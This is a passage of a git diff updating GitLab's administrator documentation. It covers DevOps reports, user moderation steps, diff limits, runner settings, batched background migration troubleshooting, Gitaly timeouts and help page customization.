asset_proxy_whitelist of table application_settings +``` +To work around this bug, follow the previous steps to complete the update. More details are available [in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160). ### 13.6.0 @@ -468,7 +517,7 @@ So, if you are using multiple Rails servers and specifically upgrading from 13.0 all servers must first be upgraded to 13.1.Z before upgrading to 13.2.0 or later: 1. Ensure all GitLab web nodes are running GitLab 13.1.Z. -1. Optionally, enable the `global_csrf_token` feature flag to enable new +1. Enable the `global_csrf_token` feature flag to enable new method of CSRF token generation: ```ruby diff --git a/doc/update/patch_versions.md b/doc/update/patch_versions.md index e50bc1610ab..0a7057ffe97 100644 --- a/doc/update/patch_versions.md +++ b/doc/update/patch_versions.md @@ -129,3 +129,8 @@ sudo -u git -H bundle exec rake gitlab:check RAILS_ENV=production ``` If all items are green, then congratulations upgrade complete! + +### 11. Make sure background migrations are finished + +[Check the status of background migrations](../user/admin_area/monitoring/background_migrations.md#check-the-status-of-background-migrations) +and make sure they are finished. diff --git a/doc/user/admin_area/analytics/dev_ops_report.md b/doc/user/admin_area/analytics/dev_ops_report.md index 6ca5e5034bf..89d8a5ea054 100644 --- a/doc/user/admin_area/analytics/dev_ops_report.md +++ b/doc/user/admin_area/analytics/dev_ops_report.md @@ -20,46 +20,49 @@ To see DevOps Report: ## DevOps Score NOTE: -Your GitLab instance's [usage ping](../settings/usage_statistics.md#usage-ping) must be activated in order to use this feature. +To see the DevOps score, you must activate your GitLab instance's [Service Ping](../settings/usage_statistics.md#service-ping). -The DevOps Score tab displays the usage of major GitLab features on your instance over -the last 30 days, averaged over the number of billable users in that time period. It also -provides a Lead score per feature, which is calculated based on GitLab analysis -of top-performing instances based on [usage ping data](../settings/usage_statistics.md#usage-ping) that GitLab has -collected. Your score is compared to the lead score of each feature and then expressed as a percentage at the bottom of said feature. -Your overall **DevOps Score** is an average of your feature scores. You can use this score to compare your DevOps status to other organizations. - -The page also provides helpful links to articles and GitLab docs, to help you -improve your scores. +You can use the DevOps score to compare your DevOps status to other organizations. -Usage ping data is aggregated on GitLab servers for analysis. Your usage -information is **not sent** to any other GitLab instances. If you have just started using GitLab, it may take a few weeks for data to be -collected before this feature is available. +The DevOps Score tab displays the usage of major GitLab features on your instance over +the last 30 days, averaged over the number of billable users in that time period. +You can also see the Leader usage score, calculated from top-performing instances based on +[Service Ping data](../settings/usage_statistics.md#service-ping) that GitLab has collected. +Your score is compared to the lead score of each feature and then expressed +as a percentage at the bottom of said feature. Your overall **DevOps Score** is an average of your +feature scores. + +Service Ping data is aggregated on GitLab servers for analysis. Your usage +information is **not sent** to any other GitLab instances. +If you have just started using GitLab, it might take a few weeks for data to be collected before this +feature is available. ## DevOps Adoption **(ULTIMATE SELF)** -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/247112) in GitLab 13.7 as a [Beta feature](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta) +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/247112) in GitLab 13.7 as a [Beta feature](https://about.gitlab.com/handbook/product/gitlab-the-product/#beta). > - [Deployed behind a feature flag](../../../user/feature_flags.md), disabled by default. > - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/59267) in GitLab 14.0. > - Enabled on GitLab.com. > - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#disable-or-enable-devops-adoption). **(ULTIMATE SELF)** +> - The Overview tab [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/330401) in GitLab 14.1. +> - DAST and SAST metrics [added](https://gitlab.com/gitlab-org/gitlab/-/issues/328033) in GitLab 14.1. -The DevOps Adoption tab shows you which groups within your organization are using the most essential features of GitLab: +DevOps Adoption shows you which groups in your organization are using the most essential features of GitLab: - Dev - - Issues - - Merge Requests - Approvals - Code owners + - Issues + - Merge requests - Sec - - Scans + - DAST + - SAST - Ops - - Runners - - Pipelines - Deployments + - Pipelines + - Runners -When managing groups in the UI, you can add your groups with the **Add group to table** -button, in the top right hand section the page. +To add your groups, in the top right-hand section the page, select **Add group to table**. DevOps Adoption allows you to: @@ -67,7 +70,7 @@ DevOps Adoption allows you to: - Identify specific groups that are lagging in their adoption of GitLab so you can help them along in their DevOps journey. - Find the groups that have adopted certain features and can provide guidance to other groups on how to use those features. - + ### Disable or enable DevOps Adoption diff --git a/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_0.png b/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_0.png Binary files differdeleted file mode 100644 index f4170b2938c..00000000000 --- a/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_0.png +++ /dev/null diff --git a/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_1.png b/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_1.png Binary files differnew file mode 100644 index 00000000000..79481e43e8e --- /dev/null +++ b/doc/user/admin_area/analytics/img/admin_devops_adoption_v14_1.png diff --git a/doc/user/admin_area/analytics/user_cohorts.md b/doc/user/admin_area/analytics/user_cohorts.md deleted file mode 100644 index b906f9b8fa6..00000000000 --- a/doc/user/admin_area/analytics/user_cohorts.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: '../user_cohorts.md' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](../user_cohorts.md). - -<!-- This redirect file can be deleted after <2021-06-01>. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/user/admin_area/approving_users.md b/doc/user/admin_area/approving_users.md index 3d9722035d5..2852f73ffc8 100644 --- a/doc/user/admin_area/approving_users.md +++ b/doc/user/admin_area/approving_users.md @@ -47,7 +47,8 @@ To approve or reject a user sign up: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. 1. Select the **Pending approval** tab. -1. In the user's row, select settings (**{settings}**). +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. 1. Select **Approve** or **Reject**. Approving a user: diff --git a/doc/user/admin_area/credentials_inventory.md b/doc/user/admin_area/credentials_inventory.md index dfb37cb8646..8c5ae2dfb47 100644 --- a/doc/user/admin_area/credentials_inventory.md +++ b/doc/user/admin_area/credentials_inventory.md @@ -38,7 +38,7 @@ The following is an example of the Credentials inventory page: If you see a **Revoke** button, you can revoke that user's PAT. Whether you see a **Revoke** button depends on the token state, and if an expiration date has been set. For more information, see the following table: -| Token state | [Token expiration enforced?](settings/account_and_limit_settings.md#do-not-enforce-personal-access-token-expiration) | Show Revoke button? | Comments | +| Token state | [Token expiration enforced?](settings/account_and_limit_settings.md#allow-expired-personal-access-tokens-to-be-used) | Show Revoke button? | Comments | |-------------|------------------------|--------------------|----------------------------------------------------------------------------| | Active | Yes | Yes | Allows administrators to revoke the PAT, such as for a compromised account | | Active | No | Yes | Allows administrators to revoke the PAT, such as for a compromised account | diff --git a/doc/user/admin_area/custom_project_templates.md b/doc/user/admin_area/custom_project_templates.md index 6cf3c5bbd7d..12d143b3a13 100644 --- a/doc/user/admin_area/custom_project_templates.md +++ b/doc/user/admin_area/custom_project_templates.md @@ -9,36 +9,33 @@ type: reference > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/6860) in [GitLab Premium](https://about.gitlab.com/pricing/) 11.2. -GitLab administrators can configure the group where all the custom project -templates are sourced. +GitLab administrators can set a group to be the source of project templates that are +selectable when a new project is created on the instance. These templates can be selected +when you go to **New project > Create from template** and select the **Instance** tab. -Every project directly under the group namespace will be -available to the user if they have access to them. For example: +Every project in the group, but not its subgroups, can be selected when a new project +is created, based on the user's access permissions: -- Public projects, in the group will be available to every signed-in user, if all enabled [project features](../project/settings/index.md#sharing-and-permissions) +- Public projects can be selected by any signed-in user as a template for a new project, + if all enabled [project features](../project/settings/index.md#sharing-and-permissions) except for GitLab Pages are set to **Everyone With Access**. -- Private projects will be available only if the user is a member of the project. +- Private projects can be selected only by users who are members of the projects. Repository and database information that are copied over to each new project are -identical to the data exported with the -[GitLab Project Import/Export](../project/settings/import_export.md). +identical to the data exported with the [GitLab Project Import/Export](../project/settings/import_export.md). -NOTE: -To set project templates at a group level, -see [Custom group-level project templates](../group/custom_project_templates.md). +To set project templates at the group level, see [Custom group-level project templates](../group/custom_project_templates.md). -## Configuring +## Select instance-level project template group -GitLab administrators can configure a GitLab group that serves as template -source for an entire GitLab instance: +To select the group to use as the source for the project templates: 1. On the top bar, navigate to **Menu > Admin > Settings > Templates**. 1. Expand **Custom project templates**. 1. Select a group to use. 1. Select **Save changes**. -NOTE: -Projects below subgroups of the template group are **not** supported. +Projects in subgroups of the template group are **not** included in the template list. <!-- ## Troubleshooting diff --git a/doc/user/admin_area/diff_limits.md b/doc/user/admin_area/diff_limits.md index 37fdb3ae195..4be1ace10aa 100644 --- a/doc/user/admin_area/diff_limits.md +++ b/doc/user/admin_area/diff_limits.md @@ -21,10 +21,11 @@ consumption of your instance. Keep this in mind when adjusting the maximum. To speed the loading time of merge request views and branch comparison views on your instance, you can configure three instance-level maximum values for diffs: -- **Maximum diff patch size**: The total size, in bytes, of the entire diff. -- **Maximum diff files**: The total number of files changed in a diff. -- **Maximum diff files**: The total number of files changed in a diff. The default value is 1000. -- **Maximum diff lines**: The total number of lines changed in a diff. The default value is 50,000. +| Value | Definition | Default value | Maximum value | +| ----- | ---------- | :-----------: | :-----------: | +| **Maximum diff patch size** | The total size, in bytes, of the entire diff. | 200 KB | 500 KB | +| **Maximum diff files** | The total number of files changed in a diff. | 1000 | 3000 | +| **Maximum diff lines** | The total number of lines changed in a diff. | 50,000 | 100,000 | When a diff reaches 10% of any of these values, the files are shown in a collapsed view, with a link to expand the diff. Diffs that exceed any of the @@ -35,7 +36,7 @@ To configure these values: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. In the left sidebar, select **Settings > General**. 1. Expand **Diff limits**. -1. Enter a value for **Maximum diff patch size**, measured in bytes. +1. Enter a value for the diff limit. 1. Select **Save changes**. <!-- ## Troubleshooting diff --git a/doc/user/admin_area/img/index_runners_search_or_filter.png b/doc/user/admin_area/img/index_runners_search_or_filter.png Binary files differdeleted file mode 100644 index 5176a1a39bf..00000000000 --- a/doc/user/admin_area/img/index_runners_search_or_filter.png +++ /dev/null diff --git a/doc/user/admin_area/img/index_runners_search_or_filter_v14_1.png b/doc/user/admin_area/img/index_runners_search_or_filter_v14_1.png Binary files differnew file mode 100644 index 00000000000..ab196a0ca9e --- /dev/null +++ b/doc/user/admin_area/img/index_runners_search_or_filter_v14_1.png diff --git a/doc/user/admin_area/index.md b/doc/user/admin_area/index.md index 2e4a8261c63..31fd1a3a0a1 100644 --- a/doc/user/admin_area/index.md +++ b/doc/user/admin_area/index.md @@ -160,7 +160,7 @@ You can impersonate a user in the following ways: 1. In the left sidebar, select **Overview > Users**. 1. From the list of users, select a user. 1. Select **Impersonate**. -- With the API, using [impersonation tokens](../../api/README.md#impersonation-tokens). +- With the API, using [impersonation tokens](../../api/index.md#impersonation-tokens). All impersonation activities are [captured with audit events](../../administration/audit_events.md#impersonation-data). @@ -276,21 +276,22 @@ To search runners' descriptions: You can also filter runners by status, type, and tag. To filter: 1. Click in the **Search or filter results...** field. -1. Select **status:**, **type:**, or **tag:**. +1. Select **Status**, **Type**, or **Tags**. 1. Select or enter your search criteria. - + For each runner, the following attributes are listed: | Attribute | Description | |--------------|-------------| -| Type | One or more of the following states: shared, group, specific, locked, or paused | -| Runner token | Token used to identify the runner, and which the runner uses to communicate with the GitLab instance | -| Description | Description given to the runner when it was created | +| Type/State | One or more of the following states: shared, group, specific, locked, or paused | +| Runner token | Partial token used to identify the runner, and which the runner uses to communicate with the GitLab instance | +| Runner ID | Numerical ID of the runner | +| Description | Description given to the runner | | Version | GitLab Runner version | | IP address | IP address of the host on which the runner is registered | -| Projects | Projects to which the runner is assigned | +| Projects | Number of projects to which the runner is assigned | | Jobs | Total of jobs run by the runner | | Tags | Tags associated with the runner | | Last contact | Timestamp indicating when the runner last contacted the GitLab instance | diff --git a/doc/user/admin_area/license.md b/doc/user/admin_area/license.md index 58876b87576..57f643b75c7 100644 --- a/doc/user/admin_area/license.md +++ b/doc/user/admin_area/license.md @@ -107,7 +107,7 @@ For GitLab self-managed instances, you have a 14-day grace period before this occurs. - To resume functionality, upload a new license. -- To fall back to Free features, delete the expired license. +- To fall back to Free features, delete all expired licenses. ### Remove a license @@ -117,6 +117,8 @@ To remove a license from a self-managed instance: 1. On the left sidebar, select **License**. 1. Select **Remove license**. +These steps may need to be repeated to completely remove all licenses, including those applied in the past. + ## License history You can upload and view more than one license, but only the latest license in the current date diff --git a/doc/user/admin_area/moderate_users.md b/doc/user/admin_area/moderate_users.md index 71e72cc630c..3889dd93d59 100644 --- a/doc/user/admin_area/moderate_users.md +++ b/doc/user/admin_area/moderate_users.md @@ -23,8 +23,9 @@ or directly from the Admin Area. To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. -1. Select a user. -1. Under the **Account** tab, select **Block user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Block**. A blocked user: @@ -47,8 +48,9 @@ A blocked user can be unblocked from the Admin Area. To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. 1. Select on the **Blocked** tab. -1. Select a user. -1. Under the **Account** tab, select **Unblock user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Unblock**. Users can also be unblocked using the [GitLab API](../../api/users.md#unblock-user). @@ -85,8 +87,9 @@ A user can be deactivated from the Admin Area. To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. -1. Select a user. -1. Under the **Account** tab, select **Deactivate user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Deactivate**. Please note that for the deactivation option to be visible to an admin, the user: @@ -126,8 +129,9 @@ To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. 1. Select the **Deactivated** tab. -1. Select a user. -1. Under the **Account** tab, select **Activate user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Activate**. Users can also be activated using the [GitLab API](../../api/users.md#activate-user). @@ -145,7 +149,7 @@ A deactivated user can also activate their account themselves by logging back in GitLab administrators can ban users. NOTE: -This feature is behind a feature flag that is disabled by default. GitLab administrators +This feature is behind a feature flag that is disabled by default. GitLab administrators with access to the GitLab Rails console can [enable](../../administration/feature_flags.md) this feature for your GitLab instance. @@ -157,8 +161,9 @@ Users can be banned using the Admin Area. To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. -1. Select a user. -1. Under the **Account** tab, select **Ban user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Ban user**. NOTE: This feature is a work in progress. Currently, banning a user @@ -172,8 +177,9 @@ A banned user can be unbanned using the Admin Area. To do this: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Overview > Users**. 1. Select the **Banned** tab. -1. Select a user. -1. Under the **Account** tab, select **Unban user**. +1. (Optional) Select a user. +1. Select the **{settings}** **User administration** dropdown. +1. Select **Unban user**. NOTE: Unbanning a user changes the user's state to active and consumes a diff --git a/doc/user/admin_area/monitoring/background_migrations.md b/doc/user/admin_area/monitoring/background_migrations.md index 50593959710..cbaa4b30cb7 100644 --- a/doc/user/admin_area/monitoring/background_migrations.md +++ b/doc/user/admin_area/monitoring/background_migrations.md @@ -4,7 +4,7 @@ group: Database info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Batched Background Migrations **(FREE SELF)** +# Batched background migrations **(FREE SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/51332) in GitLab 13.11. > - [Deployed behind a feature flag](../../../user/feature_flags.md), disabled by default. @@ -21,16 +21,19 @@ are created by GitLab developers and run automatically on upgrade. However, such limited in scope to help with migrating some `integer` database columns to `bigint`. This is needed to prevent integer overflow for some tables. -All migrations must be finished before upgrading GitLab. To check the status of the existing -migrations, execute this command: +## Check the status of background migrations **(FREE SELF)** -```ruby -Gitlab::Database::BackgroundMigration::BatchedMigration.pluck(:id, :table_name, :status) -``` +All migrations must have a `Finished` status before updating GitLab. To check the status of the existing +migrations: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Monitoring > Background Migrations**. + +  -## Enable or disable Batched Background Migrations **(FREE SELF)** +## Enable or disable batched background migrations **(FREE SELF)** -Batched Background Migrations is under development but ready for production use. +Batched background migrations are under development but ready for production use. It is deployed behind a feature flag that is **enabled by default**. [GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) can opt to disable it. @@ -63,7 +66,7 @@ To maximize throughput of batched background migrations (in terms of the number ## Enable or disable automatic batch size optimization **(FREE SELF)** -Automatic batch size optimization for Batched Background Migrations is under development but ready for production use. +Automatic batch size optimization for batched background migrations is under development but ready for production use. It is deployed behind a feature flag that is **enabled by default**. [GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) can opt to disable it. @@ -79,3 +82,27 @@ To disable it: ```ruby Feature.disable(:optimize_batched_migrations) ``` + +## Troubleshooting + +### Database migrations failing because of batched background migration not finished + +When updating to GitLab 14.2 or later there might be a database migration failing with a message like: + +```plaintext +StandardError: An error has occurred, all later migrations canceled: + +Expected batched background migration for the given configuration to be marked as 'finished', but it is 'active': + {:job_class_name=>"CopyColumnUsingBackgroundMigrationJob", :table_name=>"push_event_payloads", :column_name=>"event_id", :job_arguments=>[["event_id"], ["event_id_convert_to_bigint"]]} +``` + +To fix this error: + +1. Update to either 14.0.5 or 14.1. +1. [Check the status](#check-the-status-of-background-migrations) of the batched background migration from the error message, and make sure it is listed as finished. If it is still active, either wait until it is done, or finalize it manually using the command suggested in the error, for example: + +```shell +sudo gitlab-rake gitlab:background_migrations:finalize[CopyColumnUsingBackgroundMigrationJob,push_event_payloads,event_id,'[["event_id"]\, ["event_id_convert_to_bigint"]]'] +``` + +1. You can now update to GitLab 14.2 or higher. diff --git a/doc/user/admin_area/monitoring/img/batched_background_migrations_queued_v14_0.png b/doc/user/admin_area/monitoring/img/batched_background_migrations_queued_v14_0.png Binary files differnew file mode 100644 index 00000000000..0b0792b5e7a --- /dev/null +++ b/doc/user/admin_area/monitoring/img/batched_background_migrations_queued_v14_0.png diff --git a/doc/user/admin_area/review_abuse_reports.md b/doc/user/admin_area/review_abuse_reports.md index a179eb70453..7816d0648b2 100644 --- a/doc/user/admin_area/review_abuse_reports.md +++ b/doc/user/admin_area/review_abuse_reports.md @@ -14,7 +14,7 @@ reports in the Admin Area. ## Receiving notifications of abuse reports -To receive notifications of new abuse reports by e-mail, follow these steps: +To receive notifications of new abuse reports by email, follow these steps: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Settings > Reporting**. diff --git a/doc/user/admin_area/settings/account_and_limit_settings.md b/doc/user/admin_area/settings/account_and_limit_settings.md index f2a849e1894..2b60ed5345b 100644 --- a/doc/user/admin_area/settings/account_and_limit_settings.md +++ b/doc/user/admin_area/settings/account_and_limit_settings.md @@ -199,7 +199,7 @@ Once a lifetime for personal access tokens is set, GitLab: allowed lifetime. Three hours is given to allow administrators to change the allowed lifetime, or remove it, before revocation takes place. -## Enforce SSH key expiration **(ULTIMATE SELF)** +## Allow expired SSH keys to be used **(ULTIMATE SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/250480) in GitLab 13.9. > - [Enabled by default](https://gitlab.com/gitlab-org/gitlab/-/issues/320970) in GitLab 14.0. @@ -215,15 +215,14 @@ To allow the use of expired SSH keys: Disabling SSH key expiration immediately enables all expired SSH keys. -## Do not enforce Personal Access Token expiration **(ULTIMATE SELF)** +## Allow expired Personal Access Tokens to be used **(ULTIMATE SELF)** > - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/214723) in GitLab Ultimate 13.1. > - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/296881) in GitLab 13.9. -By default, expired personal access tokens (PATs) cannot be used. -You can allow the use of expired PATs with the following steps: +By default, expired personal access tokens (PATs) **are not usable**. -To do this: +To allow the use of expired PATs: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. In the left sidebar, select **Settings > General**. diff --git a/doc/user/admin_area/settings/continuous_integration.md b/doc/user/admin_area/settings/continuous_integration.md index ffe969a6799..69d86259409 100644 --- a/doc/user/admin_area/settings/continuous_integration.md +++ b/doc/user/admin_area/settings/continuous_integration.md @@ -88,7 +88,7 @@ The setting at all levels is only available to GitLab administrators. The default expiration time of the [job artifacts](../../../administration/job_artifacts.md) can be set in the Admin Area of your GitLab instance. The syntax of duration is -described in [`artifacts:expire_in`](../../../ci/yaml/README.md#artifactsexpire_in) +described in [`artifacts:expire_in`](../../../ci/yaml/index.md#artifactsexpire_in) and the default value is `30 days`. 1. On the top bar, select **Menu >** **{admin}** **Admin**. @@ -97,7 +97,7 @@ and the default value is `30 days`. 1. Click **Save changes** for the changes to take effect. This setting is set per job and can be overridden in -[`.gitlab-ci.yml`](../../../ci/yaml/README.md#artifactsexpire_in). +[`.gitlab-ci.yml`](../../../ci/yaml/index.md#artifactsexpire_in). To disable the expiration, set it to `0`. The default unit is in seconds. NOTE: @@ -195,8 +195,8 @@ As of June 22, 2020 the [value is set](../../gitlab_com/index.md#gitlab-cicd) to ## Protect CI/CD variables by default -To set all new [CI/CD variables](../../../ci/variables/README.md) as -[protected](../../../ci/variables/README.md#protect-a-cicd-variable) by default: +To set all new [CI/CD variables](../../../ci/variables/index.md) as +[protected](../../../ci/variables/index.md#protect-a-cicd-variable) by default: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Settings > CI/CD**. @@ -214,7 +214,7 @@ of your GitLab instance (`.gitlab-ci.yml` if not set): 1. Input the new file and path in the **Default CI/CD configuration file** field. 1. Hit **Save changes** for the changes to take effect. -It is also possible to specify a [custom CI/CD configuration file for a specific project](../../../ci/pipelines/settings.md#custom-cicd-configuration-file). +It is also possible to specify a [custom CI/CD configuration file for a specific project](../../../ci/pipelines/settings.md#specify-a-custom-cicd-configuration-file). ## Required pipeline configuration **(PREMIUM SELF)** @@ -224,7 +224,7 @@ This feature is being re-evaluated in favor of a different We recommend that users who haven't yet implemented this feature wait for the new solution. -You can set a [CI/CD template](../../../ci/examples/README.md#cicd-templates) +You can set a [CI/CD template](../../../ci/examples/index.md#cicd-templates) as a required pipeline configuration for all projects on a GitLab instance. You can use a template from: @@ -233,13 +233,13 @@ use a template from: NOTE: When you use a configuration defined in an instance template repository, - nested [`include:`](../../../ci/yaml/README.md#include) keywords + nested [`include:`](../../../ci/yaml/index.md#include) keywords (including `include:file`, `include:local`, `include:remote`, and `include:template`) [do not work](https://gitlab.com/gitlab-org/gitlab/-/issues/35345). The project CI/CD configuration merges into the required pipeline configuration when a pipeline runs. The merged configuration is the same as if the required pipeline configuration -added the project configuration with the [`include` keyword](../../../ci/yaml/README.md#include). +added the project configuration with the [`include` keyword](../../../ci/yaml/index.md#include). To view a project's full merged configuration, [View the merged YAML](../../../ci/pipeline_editor/index.md#view-expanded-configuration) in the pipeline editor. @@ -280,6 +280,45 @@ To set the maximum file size: 1. Enter the maximum file size, in bytes. 1. Click **Save size limits**. +## Runner registration + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/22225) in GitLab 14.1. +> - [Deployed behind a feature flag](../../feature_flags.md), disabled by default. +> - Disabled on GitLab.com. +> - Not recommended for production use. +> - To use in GitLab self-managed instances, ask a GitLab administrator to enable it. **(FREE SELF)** + +GitLab administrators can adjust who is allowed to register runners, by showing and hiding areas of the UI. + +By default, all members of a project and group are able to register runners. + +To change this: + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. Go to **Settings > CI/CD**. +1. Expand the **Runner registration** section. +1. Select the desired options. +1. Click **Save changes**. + +When the registration sections are hidden in the UI, members of the project or group that need to register runners must contact the administrators. + +This feature is currently behind a feature flag. +To enable it: + +**In Omnibus installations:** + +1. Enter the Rails console: + + ```shell + sudo gitlab-rails console + ``` + +1. Flip the switch and enable the feature flag: + + ```ruby + Feature.enable(:runner_registration_control) + ``` + ## Troubleshooting ### 413 Request Entity Too Large diff --git a/doc/user/admin_area/settings/gitaly_timeouts.md b/doc/user/admin_area/settings/gitaly_timeouts.md index 6f488efee11..04887906c91 100644 --- a/doc/user/admin_area/settings/gitaly_timeouts.md +++ b/doc/user/admin_area/settings/gitaly_timeouts.md @@ -8,23 +8,20 @@ type: reference # Gitaly timeouts **(FREE SELF)** [Gitaly](../../../administration/gitaly/index.md) timeouts are configurable. The timeouts can be -configured to make sure that long running Gitaly calls don't needlessly take up resources. +configured to make sure that long-running Gitaly calls don't needlessly take up resources. To access Gitaly timeout settings: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. On the left sidebar, select **Settings > Preferences**. -1. Expand the **Gitaly** section. +1. Expand the **Gitaly timeouts** section. ## Available timeouts -The following timeouts can be modified: +The following timeouts are available. -- **Default Timeout Period**. This timeout is the default for most Gitaly calls. It should be shorter than the - worker timeout that can be configured for [Puma](https://docs.gitlab.com/omnibus/settings/puma.html#puma-settings). - Used to make sure that Gitaly calls made within a web request cannot exceed the entire request timeout. - Defaults to 55 seconds. - -- **Fast Timeout Period**. This is the timeout for very short Gitaly calls. Defaults to 10 seconds. -- **Medium Timeout Period**. This timeout should be between the default and the fast timeout. - Defaults to 30 seconds. +| Timeout | Default | Description | +|:--------|:-----------|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| Default | 55 seconds | Timeout for most Gitaly calls (not enforced for `git` `fetch` and `push` operations, or Sidekiq jobs). For example, checking if a repository exists on disk. Makes sure that Gitaly calls made within a web request cannot exceed the entire request timeout. It should be shorter than the worker timeout that can be configured for [Puma](https://docs.gitlab.com/omnibus/settings/puma.html#puma-settings). If a Gitaly call timeout exceeds the worker timeout, the remaining time from the worker timeout is used to avoid having to terminate the worker. | +| Fast | 10 seconds | Timeout for fast Gitaly operations used within requests, sometimes multiple times. For example, checking if a repository exists on disk. If fast operations exceed this threshold, there may be a problem with a storage shard. Failing fast can help maintain the stability of the GitLab instance. | +| Medium | 30 seconds | Timeout for Gitaly operations that should be fast (possibly within requests) but preferably not used multiple times within a request. For example, loading blobs. Timeout that should be set between Default and Fast. | diff --git a/doc/user/admin_area/settings/help_page.md b/doc/user/admin_area/settings/help_page.md index d7c96c295f6..d2f99a51ec3 100644 --- a/doc/user/admin_area/settings/help_page.md +++ b/doc/user/admin_area/settings/help_page.md @@ -5,36 +5,58 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: howto --- -# Customizing the 'Help' and login page messages +# Customize the Help and sign-in page messages In large organizations, it is useful to have information about who to contact or where -to go for help. You can customize and display this information on the GitLab server's -`/help` page and on the GitLab login page. +to go for help. You can customize and display this information on the GitLab `/help` page and on +the GitLab sign-in page. -## Adding a help message to the help page +## Add a help message to the Help page -You can add a help message, which is shown on the GitLab `/help` page (e.g., -<https://gitlab.com/help>) in a new section at the top of the `/help` page: +You can add a help message, which is shown at the top of the GitLab `/help` page (for example, +<https://gitlab.com/help>): 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. In the left sidebar, select **Settings > Preferences**, then expand **Help page**. -1. Under **Help page text**, fill in the information you wish to display on `/help`. -1. Save your changes. You can now see the message on `/help`. +1. Under **Additional text to show on the Help page**, fill in the information you wish to display on `/help`. +1. Select **Save changes**. You can now see the message on `/help`. -## Adding a help message to the login page **(STARTER)** +NOTE: +By default, `/help` is visible to unauthenticated users. However, if the +[**Public** visibility level](visibility_and_access_controls.md#restricted-visibility-levels) +is restricted, `/help` is visible only to signed-in users. -You can add a help message, which is shown on the GitLab login page in a new section -titled `Need Help?`, located below the login page message: +## Add a help message to the sign-in page **(STARTER)** + +You can add a help message, which is shown on the GitLab sign-in page. The message appears in a new +section titled **Need Help?**, located below the sign-in page message: 1. On the top bar, select **Menu >** **{admin}** **Admin**. 1. In the left sidebar, select **Settings > Preferences**, then expand **Help page**. -1. Under **Help text**, fill in the information you wish to display on the login page. +1. Under **Additional text to show on the sign-in page**, fill in the information you wish to + display on the sign-in page. +1. Select **Save changes**. You can now see the message on the sign-in page. + +## Hide marketing-related entries from the Help page + +GitLab marketing-related entries are occasionally shown on the Help page. To hide these entries: -  +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. In the left sidebar, select **Settings > Preferences**, then expand **Help page**. +1. Select the **Hide marketing-related entries from the Help page** checkbox. +1. Select **Save changes**. -1. Save your changes. +## Set a custom Support page URL - +You can specify a custom URL to which users are directed when they: + +- Select **Support** from the Help dropdown. +- Select **See our website for help** on the Help page. + +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. In the left sidebar, select **Settings > Preferences**, then expand **Help page**. +1. Enter the URL in the **Support page URL** field. +1. Select **Save changes**. <!-- ## Troubleshooting diff --git a/doc/user/admin_area/settings/img/enforce_terms.png b/doc/user/admin_area/settings/img/enforce_terms.png Binary files differindex 699e0e63ceb..de1a82275ab 100644 --- a/doc/user/admin_area/settings/img/enforce_terms.png +++ b/doc/user/admin_area/settings/img/enforce_terms.png diff --git a/doc/user/admin_area/settings/img/help_page_help_text_ex_v12_3.png b/doc/user/admin_area/settings/img/help_page_help_text_ex_v12_3.png Binary files differdeleted file mode 100644 index 973be2e8b6e..00000000000 --- 